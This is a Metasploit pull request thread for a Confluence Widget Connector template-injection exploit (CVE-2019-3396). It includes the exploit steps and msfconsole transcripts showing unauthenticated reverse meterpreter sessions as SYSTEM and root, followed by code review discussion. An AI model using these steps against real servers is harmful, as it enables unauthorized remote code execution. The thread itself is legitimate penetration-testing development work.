Atlassian Confluence RCE exploit (CVE-2019-3396)
rapid7/metasploit-framework pull request #11711
Opened 2019-04-11 14:57 UTC by rrockru

# Description

This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.

The vulnerability exists in the Widget Connector Macro which allow inject the "\_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.

The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

# Vulnerable Application
Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.

# Verification Steps

List the steps needed to make sure this thing works

- [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/confluence_widget_connector`
- [ ] `set RHOST <IP>`
- [ ] `set RPORT <PORT>`
- [ ] `set SRVHOST <HOST_IP>`
- [ ] `check`
- [ ] You should see `The target is vulnerable`
- [ ] `exploit`
- [ ] You should get a meterpreter session.

# Options
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
- **ListenerTimeout**: Time that the Listener will wait for the payload request ("10" is the default)

# Scenario
## Tested on Confluence 6.8.2 with Windows target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```

## Tested on Confluence 6.8.2 with Java target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```

## Tested on Confluence 6.8.2 with Linux target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```

2019-04-11 14:59 UTC, trenerok commented
👍

2019-04-11 16:07 UTC, wvu-r7 commented
Excellent turnaround time from disclosure to exploit!

2019-04-11 16:21 UTC, wvu requested changes
Thanks for the submission. This is my first pass of review.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +        This vulnerability was originally discovered by Daniil Dmitriev
Please credit Daniil in the `Author` section. Thank you.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +require 'json'
Neither of these should need to be required.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +      'References'     =>
If you used any resources other than the advisory to build this exploit, please list them in this section. Otherwise link to or include your research. Thanks!

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    if /check\.vm$/ === arg
This should probably be a `case` statement.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +      @check_text = 'PwN3d'
This should be randomized.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +        'Origin' => full_uri(vhost_uri: true)
Nice, you used `vhost_uri`!

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
I wouldn't hardcode this YouTube URL... but I like it.

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    @command = "chmod 777 #{fname}"
These permissions seem excessive unless necessary. Why not `600` or `700`? This method doesn't look like it's being used either. Was this module copied from `modules/exploits/multi/http/jira_hipchat_template.rb`?

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +  def wait_for_session
Interesting use of this override. Looks similar to `modules/exploits/multi/http/jenkins_xstream_deserialize.rb`?

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +  def print_status(msg='')
None of these should be necessary unless you're fixing a bug (that should be fixed in core).

2019-04-11 16:21 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    "MSF_RESPONSE\n#{string}MSF_RESPONSE\n"
Definitely randomize this.

2019-04-11 16:25 UTC, wvu-r7 commented
This PR should come from a topic/feature branch, not `master`. Please use a [topic branch](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md#code-contributions) next time. While I don't think it's necessary to close this PR, someone else might. (Please track between PRs if you do.)

2019-04-11 20:41 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +        This vulnerability was originally discovered by Daniil Dmitriev
Done.

2019-04-11 20:41 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +require 'json'
Done.

2019-04-11 20:41 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +      'References'     =>
Done.

2019-04-11 20:41 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    if /check\.vm$/ === arg
Done.

2019-04-11 20:41 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +      @check_text = 'PwN3d'
Done.

2019-04-11 20:44 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    @command = "chmod 777 #{fname}"
Yep, this part copied from `modules/exploits/multi/http/jira_hipchat_template.rb`, but you'r right, it's excessive. I've changed permissions to `700`.

2019-04-11 20:44 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +  def wait_for_session
Removed this part.

2019-04-11 20:44 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +  def print_status(msg='')
Removed this part.

2019-04-11 20:44 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    "MSF_RESPONSE\n#{string}MSF_RESPONSE\n"
Done.

2019-04-11 20:46 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
This necessary to trigger vulnerable handler.

2019-04-11 20:55 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
Gotcha. I only skimmed the writeups so far, so I'm assuming this needs to be a reachable URL. Carry on. ;)

2019-04-11 20:57 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    @command = "chmod 777 #{fname}"
Is the method being used anywhere? If not, you can remove it. If you plan to use it, carry on.

2019-04-11 21:02 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
I would make this a configurable option in that case. Being able to supply a non-hardcoded URL would be helpful if it isn't being randomized.

2019-04-11 21:05 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    @command = "chmod 777 #{fname}"
Hmmm... It seems I forgot remove this part from previous variation of code. Removed.

2019-04-11 21:11 UTC, wvu-r7 commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +    @command = "chmod 777 #{fname}"
All good. Thanks!

2019-04-11 21:14 UTC, rrockru commented on modules/exploits/multi/http/confluence_widget_connector.rb
> +                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
Done. It's a configurable option now.

2019-04-12 11:25 UTC, bcoles commented
> While I don't think it's necessary to close this PR

---

It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Please resubmit from a unique branch.

2019-04-12 11:35 UTC, rrockru commented
Pull request recreated from unique branch: https://github.com/rapid7/metasploit-framework/pull/11717

2019-04-12 11:38 UTC, closed without merging

2019-04-12 16:59 UTC, wvu-r7 commented
@bcoles: Thanks for that. I have been the chief proponent of that advice and the reason it's so strongly enforced. :-)

It is still best practice, and we will continue to strongly recommend it. I was addressing the fact that it's not required for a clean merge if the rest of the process is correct. Additionally, I have informed my team that old diffs are still viewable even if the branch has diverged.

The misconception in the past was that it was technically necessary to close a PR. That is not true. However, it is our process, and we will continue to enforce it.

I'm just a reviewer on this one. Thanks!

2019-04-12 20:08 UTC, bcoles commented
> 
> 
> @bcoles: Thanks for that. I have been the chief proponent of that advice for MSF and the reason it's so strongly enforced here. :-)
> 

My reply is copypasta pre-written template, and my motivation is based on observations of doctrine provided by *-r7 members,

I mean, I already have the copypasta reply ready to go. Seems to be a waste not to use it.

![](https://memegenerator.net/img/instances/71434637/you-need-people-like-me-so-you-can-point-your-fingers-and-say-thats-the-bad-guy.jpg)

2019-05-21 20:44 UTC, securitaydude commented
Just curious but why are the targets listed in the Metasploit module as ARCH_X86 for both windows and linux when the vulnerable versions of Confluence 6.x.x are all 64-bit? Confluence does not offer a 32-bit 6.x.x version.

2019-05-21 21:22 UTC, wvu-r7 commented
Discussion continued on #11717. This ticket is dead. FWIW, our x86 payloads do run on x64. I would like to see explicit x64 support added to the module, though. There are some things you can do only with the exact arch.